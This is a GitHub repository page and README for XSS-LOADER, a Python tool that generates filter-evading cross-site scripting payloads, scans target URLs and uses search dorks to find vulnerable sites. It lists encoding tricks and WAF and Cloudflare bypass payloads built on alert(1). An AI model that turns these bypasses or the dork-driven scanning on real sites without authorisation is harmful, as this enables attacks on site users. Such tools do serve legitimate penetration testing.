https://github.com/capture0x/XSS-LOADER
Xss Payload Generator ~ Xss Scanner ~ Xss Dork Finder
https://github.com/capture0x/XSS-LOADER
bypass-filter dork-finder hacking payload-generator payloads xss xss-attacks xss-bypass xss-detection xss-finder xss-injection xss-payloads xss-scanner
Last synced: about 1 month ago
JSON representation
Xss Payload Generator ~ Xss Scanner ~ Xss Dork Finder
- Host: GitHub
- URL: https://github.com/capture0x/XSS-LOADER
- Owner: capture0x
- License: cc0-1.0
- Created: 2020-03-23T18:04:36.000Z (about 5 years ago)
- Default Branch: master
- Last Pushed: 2023-07-25T15:47:52.000Z (almost 2 years ago)
- Last Synced: 2024-08-03T01:26:01.308Z (10 months ago)
- Topics: bypass-filter, dork-finder, hacking, payload-generator, payloads, xss, xss-attacks, xss-bypass, xss-detection, xss-finder, xss-injection, xss-payloads, xss-scanner
- Language: Python
- Homepage:
- Size: 48.8 KB
- Stars: 543
- Watchers: 15
- Forks: 112
- Open Issues: 10
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-rainmana - capture0x/XSS-LOADER - Xss Payload Generator ~ Xss Scanner ~ Xss Dork Finder (Python)
- awesome-hacking-lists - capture0x/XSS-LOADER - Xss Payload Generator ~ Xss Scanner ~ Xss Dork Finder (Python)
README
# :gem: XSS-LOADER TOOLS :gem:
#### Written by TMRSWRR
#### Version 1.0.0
All in one tools for **XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER**
Instagram: [TMRSWRR](https://www.instagram.com/tmrswrr/)
## :camera: Screenshots :camera:
## 👇 :love_letter: How to use :love_letter: 👇
[](https://www.youtube.com/watch?v=ys_a5yx1hmY)
## 📒 Read Me 📒
* This tool creates payload for use in xss injection
* Select default payload tags from parameter or write your payload
* It makes xss inj. with Xss Scanner parameter
* It finds vulnerable sites url with Xss Dork Finder parameter
## :cd: Installation :cd:
### Installation with requirements.txt
```bash
git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt
```
## Usage
```bash
python3 payloader.py
```
## 🗃️ Features 🗃️
#### *Basic Payload
Sets default parameter to :```alert(1)```
#### *Div Payload
Sets default parameter to :```
MOVE HERE```
#### *Body Payload
Sets default parameter to :``````
#### *Svg Payload
Sets default parameter to :``````
#### *Enter Your Payload
Encodes payload writed by user
#### *Payload Generator Parameter
Encodes payload on selected tag
#
```
* | 1. UPPER CASE----> ALERT(1)
* | 2. UPPER AND LOWER CASE----> aleRt(1)
* | 3. URL ENCODE -----> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
* | 4. HTML ENTITY ENCODE-----> <script>alert(1)</script>
* | 5. SPLIT PAYLOAD -----> pt>>alert(1)pt>>
* | 6. HEX ENCODE -----> 3c7363726970743e616c6572742831293c2f7363726970743e
* | 7. UTF-16 ENCODE -----> Encode payload to utf-16 format.
* | 8. UTF-32 ENCODE-----> Encode payload to utf-32 format.
* | 9. DELETE TAG -----> ";alert('XSS');//
* | 10. UNICODE ENCODE-----> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
* | 11. US-ASCII ENCODE -----> ¼script¾alert(1)¼/script¾
* | 12. BASE64 ENCODE -----> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
* | 13. UTF-7 ENCODE -----> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
* | 14. PARENTHESIS BYPASS -----> alert`1`
* | 15. UTF-8 ENCODE -----> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
* | 16. TAG BLOCK BREAKOUT-----> ">alert(1)
* | 17. SCRIPT BREAKOUT-----> alert(1)
* | 18. FILE UPLOAD PAYLOAD-----> ">alert(1).gif
* | 19. INSIDE COMMENTS BYPASS-----> alert(1)-->
* | 20. MUTATION PAYLOAD----->
* | 21. MALFORMED IMG-----> ![]()
alert(1)">
* | 22. SPACE BYPASS-----> ![]()
* | 23. DOWNLEVEL-HIDDEN BLOCK----->
* | 24. WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* | 25. CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload List
* | 26. POLYGLOT PAYLOADS-----> Show Polyglot Bypass Payload List
* | 27. ALERT PAYLOADS-----> Show Alert Payload List
* | 28. ALL CREATE PAYLOAD-----> Show Create All Payloads
* | 29. GO BACK MAIN MENU
* | 30. EXIT
```
#### *Xss Scanner
Initially you'll need to enter url of target
Please enter the url like this example==>e.g target -----> http://target.com/index.php?name=
Selected for scanning payload list
* BASIC PAYLOAD LIST ==> Payload list consisting of script tag
* DIV PAYLOAD LIST ==> Payload list consisting of div tag
* IMG PAYLOAD LIST ==> Payload list consisting of img tag
* BODY PAYLOAD LIST ==> Payload list consisting of body tag
* SVG PAYLOAD LIST ==> Payload list consisting of svg tag
* MIXED PAYLOAD LIST ==> Payload list consisting of all tag
* ENTER FILE PATH ==> Payload list determined by the user ,Please enter the url like this example..!
(e.g. path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt)
Results will be added in "vulnpayload.txt" after scanning.
#### *Xss Dork Finder
First enter the dork for searching:
e.g---->inurl:"search.php?q="
Results will be saved in "dork.txt" after scanning.
## Known Issues
### Fixed:
- Unicode errors
- Module errors
**Important:**
If you want to use tool for python3 installed on Windows download below link:
https://github.com/capture0x/XSS-LOADER-for-WINDOWS
## Bugs and enhancements
For bug reports or enhancements, please open an [issue](https://github.com/capture0x/XSS-LOADER/issues) here.
**Copyright 2020**